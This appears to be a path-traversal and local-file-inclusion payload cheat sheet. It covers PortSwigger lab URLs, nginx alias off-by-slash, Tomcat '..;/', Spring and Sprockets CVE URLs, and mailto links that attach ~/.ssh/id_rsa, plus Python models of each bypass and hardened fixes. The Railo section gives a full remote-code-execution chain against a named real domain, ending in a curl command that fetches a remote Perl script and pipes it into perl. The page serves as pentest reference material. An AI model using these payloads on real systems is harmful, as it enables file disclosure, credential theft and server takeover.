LFI (Local File Inclusion)
Payloads
Three traversal variants, each aimed at a different naive filter (the hosts are PortSwigger Web Security Academy lab instances):
- `....//` double write: survives a filter that removes `../` once, non-recursively
- `%252f` double URL encoding: the filter sees `..%2f`, the application decodes a second time and opens `../`
- `%00.jpg` null byte: satisfies an extension check while a C-backed file API stops reading the name at the NUL (older PHP and Java)
https://ac331fc21e54319d80214e2200bf00e6.web-security-academy.net/image?filename=....//....//....//etc/passwd
https://ac4e1f341f197cda8051248900f6006d.web-security-academy.net/image?filename=..%252f..%252f..%252f..%252fetc%2fpasswd
https://ac671fa41f1739d7804a4fc7004e001f.web-security-academy.net/image?filename=../../../etc/passwd%00.jpg
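How each payload above gets past the filter it targets, as an added example that is not from the original page or the lab application: the image root, the three filter functions, the two-stage decoding model and the hardened check are all hypothetical, chosen to mirror the three bypasses.

```python
import posixpath
from urllib.parse import unquote

IMAGE_ROOT = "/var/www/images"  # hypothetical directory the /image endpoint serves


def strip_traversal_once(filename: str) -> str:
    """Naive filter 1: removes '../' a single, non-recursive time."""
    return filename.replace("../", "")


def blocklist_without_decoding(filename: str) -> str:
    """Naive filter 2: rejects '../' on the raw value. The web server has
    already decoded the parameter once (%252f -> %2f); the application
    decodes it again later, which resolve() models with second_decode."""
    if "../" in filename:
        raise ValueError("traversal rejected")
    return filename


def require_jpg_extension(filename: str) -> str:
    """Naive filter 3: only checks that the name ends in .jpg."""
    if not filename.endswith(".jpg"):
        raise ValueError("not an image")
    return filename


def resolve(filename: str, second_decode: bool = False, c_string_open: bool = False) -> str:
    """Simulates the path the file API finally opens. second_decode models a
    framework that percent-decodes the value a second time; c_string_open
    models a C-backed open() that stops at the first NUL byte (old PHP/Java)."""
    if second_decode:
        filename = unquote(filename)
    if c_string_open:
        filename = filename.split("\x00", 1)[0]
    return posixpath.normpath(posixpath.join(IMAGE_ROOT, filename))


def escapes_root(resolved: str) -> bool:
    """True when the normalised path lies outside IMAGE_ROOT."""
    return not resolved.startswith(IMAGE_ROOT + "/")


def hardened_resolve(filename: str) -> str:
    """Hardened replacement: decode, reject leftover encoding and NUL bytes,
    normalise, then check the *result* against the root (allow-list the
    outcome instead of block-listing the input)."""
    decoded = unquote(filename)
    if unquote(decoded) != decoded:
        raise ValueError("double encoding rejected")
    if "\x00" in decoded:
        raise ValueError("NUL byte rejected")
    resolved = posixpath.normpath(posixpath.join(IMAGE_ROOT, decoded))
    if escapes_root(resolved):
        raise ValueError("path escapes root")
    return resolved


def hardened_rejects(filename: str) -> bool:
    """Convenience wrapper: does the hardened check refuse this name?"""
    try:
        hardened_resolve(filename)
    except ValueError:
        return True
    return False


# The three payloads from the page as the application receives them, i.e.
# after the web server's single percent-decode (%252f -> %2f, %00 -> NUL).
PAYLOAD_DOUBLE_WRITE = "....//....//....//etc/passwd"
PAYLOAD_DOUBLE_ENCODED = "..%2f..%2f..%2f..%2fetc/passwd"
PAYLOAD_NULL_BYTE = "../../../etc/passwd\x00.jpg"


def demo() -> dict:
    """Runs each payload through the filter it targets and returns what gets opened."""
    return {
        "double_write": resolve(strip_traversal_once(PAYLOAD_DOUBLE_WRITE)),
        "double_encoded": resolve(blocklist_without_decoding(PAYLOAD_DOUBLE_ENCODED), second_decode=True),
        "null_byte": resolve(require_jpg_extension(PAYLOAD_NULL_BYTE), c_string_open=True),
    }


if __name__ == "__main__":
    for name, path in demo().items():
        print(f"{name:15} -> {path}  escapes root: {escapes_root(path)}")
    for p in (PAYLOAD_DOUBLE_WRITE, PAYLOAD_DOUBLE_ENCODED, PAYLOAD_NULL_BYTE):
        print(f"hardened rejects {p!r}: {hardened_rejects(p)}")
```

All three naive filters let `/etc/passwd` through; the hardened version does not need to block the `....//` input at all, because after normalisation that name still lives under the root and simply will not exist.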
Polyglot URL path
A single java.net.URL string whose file part resolves to a different target on each platform; the labels mark the span each OS ends up using:

```java
import java.net.URL;

//       |---linux url----|
new URL("file:///etc/passwd?/../../Windows/win.ini");
//            |-------windows unc---------------|
```

Rely on getPath() under Windows:

```java
import java.net.URL;

URL base = new URL("file:///C:/Windows/temp/");
URL url = new URL(base, "file?/../../win.ini");   // getPath() walks out of temp/
```

Rely on normalization of getFile() or toExternalForm() under Linux:

```java
import java.net.URL;

URL base = new URL("file:///tmp/");
URL url = new URL(base, "../etc/passwd?/../../tmp/file");   // "../etc/passwd" is resolved against the base
```
Nginx
Off by slash
A prefix `location` without a trailing slash combined with an `alias` that has one lets a request escape the aliased directory: nginx replaces the matched prefix with the alias byte for byte, so `/static../x` becomes `/home/app/static/../x` on disk. The request URI itself contains no `/../` segment (`static..` is an ordinary segment), so nginx's own URI normalisation never sees a traversal.

```nginx
location /static {
    alias /home/app/static/;
}
```

This request loads the file /home/app/settings.py:
http://127.0.0.1/static../settings.py

Finding the problem (here the vulnerable prefix is /assets, aliased to the same /home/app/static/ directory):

HTTP code | URL | What it tells you
---|---|---
200 | http://target/assets/app.js | the prefix serves files
403 | http://target/assets/ | directory listing is off
404 | http://target/assets/../settings.py | the literal `..` is normalised away before location matching
403 | http://target/assets../ | `/assets..` still matches the prefix and maps to the parent directory
200 | http://target/assets../static/app.js | the parent directory plus `static/` is the aliased directory again
200 | http://target/assets../settings.py | file outside the alias is served

The fix is to give the location the same trailing slash as the alias (`location /static/`), so `/static..` no longer matches the prefix.
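A model of the prefix-location plus alias mapping, added here as an example that is neither the page's nor nginx's own code: it reproduces the substitution nginx performs (after its own segment normalisation of the URI) so the vulnerable and fixed configurations can be compared offline, and it generates the probe set from the table. The paths, the location/alias pairs and the probe file names are assumptions.

```python
import posixpath


def nginx_uri_normalize(uri: str) -> str:
    """nginx resolves '.' and '..' *segments* of the request URI before location
    matching (keeping a trailing slash); 'static..' is a plain segment and is left alone."""
    out = []
    for seg in uri.split("/")[1:]:
        if seg == "..":
            if out:
                out.pop()
        elif seg != ".":
            out.append(seg)
    return "/" + "/".join(out)


def alias_resolve(location: str, alias: str, uri: str):
    """Prefix location + alias, as nginx does it: if the normalised URI starts
    with `location`, that prefix is replaced by `alias` byte for byte and the
    filesystem resolves whatever '..' appears in the result. Returns None when
    the location does not match (another location, or a 404, handles it)."""
    uri = nginx_uri_normalize(uri)
    if not uri.startswith(location):
        return None
    return posixpath.normpath(alias + uri[len(location):])


def escapes(alias: str, path) -> bool:
    """True when the resolved filesystem path lies outside the aliased directory."""
    root = posixpath.normpath(alias)
    return path is not None and not path.startswith(root + "/")


VULNERABLE = ("/static", "/home/app/static/")   # prefix lacks the trailing slash
FIXED = ("/static/", "/home/app/static/")       # prefix and alias both end in '/'


def probe_urls(base: str, prefix: str, known_file: str, target_file: str) -> list:
    """The off-by-slash probe set from the table: the telltale is a 200 or 403
    on `prefix..` where the literal `prefix/..` gives 404."""
    alias_dirname = "static"  # assumption: basename of the aliased directory
    return [
        f"{base}{prefix}/{known_file}",
        f"{base}{prefix}/",
        f"{base}{prefix}/../{target_file}",
        f"{base}{prefix}../",
        f"{base}{prefix}../{alias_dirname}/{known_file}",
        f"{base}{prefix}../{target_file}",
    ]


if __name__ == "__main__":
    for name, cfg in (("vulnerable", VULNERABLE), ("fixed", FIXED)):
        for uri in ("/static/app.js", "/static/../settings.py", "/static../settings.py"):
            path = alias_resolve(*cfg, uri)
            print(f"{name:10} {uri:25} -> {path}  escapes: {escapes(cfg[1], path)}")
    print("\n".join(probe_urls("http://target", "/assets", "app.js", "settings.py")))
```

Run the probe URLs with curl against a suspected prefix; a 403 or 200 on `prefix../` combined with a 404 on `prefix/../` is the signature of the missing slash.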
Ruby
Grails
The sequence `..\Q/\E` is equivalent to `../` (`\Q...\E` is the Java regex literal-quoting construct), so it traverses a directory while evading filters that only match the literal `../`.
Railo admin console
The chain: reach the admin console through the `..;/` parent-directory trick (see Tomcat below), point the 404 page at the exception log, write CFML into that log with a crafted request, then trigger the 404 so the log is rendered as a template.
- Get to the admin console with
https://login.getbynder.com/..;/railo-context/admin/web.cfm
- Change the 404 error page to
/railo-context/../logs/exception.log
- Make a request whose path gets written to exception.log (URL-encode the CFML when sending it)
https://login.getbynder.com/..;/railo-context/<cfoutput> <cfexecute name='/bin/bash' arguments='#Form.shell#' timeout='10' variable='output'> </cfexecute>#output#</cfoutput>.cfm
- View the 404 error page, which now parses the injected log entry; the command comes from the `SHELL` form field (CFML form-scope names are case-insensitive, so `Form.shell` reads it)
curl https://login.getbynder.com/..;/railo-context/foo.cfm -d 'SHELL=-c "curl orange.tw/bc.pl | perl -"'
CVE-2018-3760
Path traversal in Sprockets, the Rails asset pipeline, for applications that serve assets with `config.assets.compile = true`: the `file://` prefix plus double-encoded `%252e%252e` segments escape the assets directory. The second URL targets a file the attacker has placed under /tmp. Attack URLs:
http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images/%252e%252e/%252e%252e/%252e%252e/etc/passwd
http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images/%252e%252e/%252e%252e/%252e%252e/tmp/evil.erb%3ftype=text/plain
Spring
CVE-2018-1271
Directory traversal in Spring MVC when static resources are served from a file system location on Windows; the backslashes are double-encoded (`%255c`) so they survive the first decode and reach the resource resolver as path separators. Attack URL:
http://0:8080/spring-rabbit-stock/static/%255c%255c%255c%255c%255c%255c..%255c..%255c..%255c..%255c..%255c..%255c/Windows/win.ini
Input and output: `/`, `/../`, `/foo/`, `/foo/`, `/foo/`
Tomcat
Parent directory via path parameters: Tomcat strips `;...` path parameters from every segment before resolving `..`, so `..;/` becomes `../`. A reverse proxy in front that only recognises literal `..` segments forwards the path unchanged, and any access rule it enforces on /manager never fires:
http://example.com/portal/..;/manager/html
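The normalisation mismatch behind `..;/`, as an added example that is not Tomcat's or any proxy's code: the proxy side resolves only literal `..` segments, the Tomcat side strips path parameters first, and a proxy ACL on /manager is evaluated against the wrong view. The denied prefix and the hardened proxy check are assumptions.

```python
import posixpath


def proxy_normalize(uri: str) -> str:
    """Reverse proxy (nginx/Apache style): resolves only literal '.' and '..'
    segments; to it '..;' is an ordinary segment name."""
    return posixpath.normpath(uri)


def tomcat_normalize(uri: str) -> str:
    """Tomcat: strips ';param=value' path parameters from every segment
    *before* resolving '..', so '..;' collapses to '..' and then traverses."""
    stripped = "/".join(seg.split(";", 1)[0] for seg in uri.split("/"))
    return posixpath.normpath(stripped)


def proxy_blocks(uri: str, denied_prefix: str = "/manager") -> bool:
    """A proxy ACL that denies /manager based on the proxy's own view of the path."""
    return proxy_normalize(uri).startswith(denied_prefix)


def reaches_backend_path(uri: str, denied_prefix: str = "/manager"):
    """What Tomcat ends up serving when the proxy lets the request through;
    None when the proxy ACL stops it."""
    if proxy_blocks(uri, denied_prefix):
        return None
    return tomcat_normalize(uri)


def hardened_proxy_blocks(uri: str, denied_prefix: str = "/manager") -> bool:
    """Fix on the proxy side: evaluate the ACL on the backend's normalisation,
    and refuse any segment carrying ';' outright so no further parser gap applies."""
    if any(";" in seg for seg in uri.split("/")):
        return True
    return tomcat_normalize(uri).startswith(denied_prefix)


if __name__ == "__main__":
    for uri in ("/portal/../manager/html", "/portal/..;/manager/html"):
        print(f"{uri:28} proxy sees {proxy_normalize(uri):28} "
              f"tomcat serves {reaches_backend_path(uri)}  hardened blocks: {hardened_proxy_blocks(uri)}")
```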
MailTo
A mail client that honours an `attach=` parameter in `mailto:` links lets a crafted link attach a local file, or a message fetched over IMAP from the victim's own mailbox, to the outgoing mail. Payloads:
mailto:[email protected]?attach=imap:///fetch>UID>/INBOX>1
mailto:[email protected]?attach=~/.ssh/id_rsa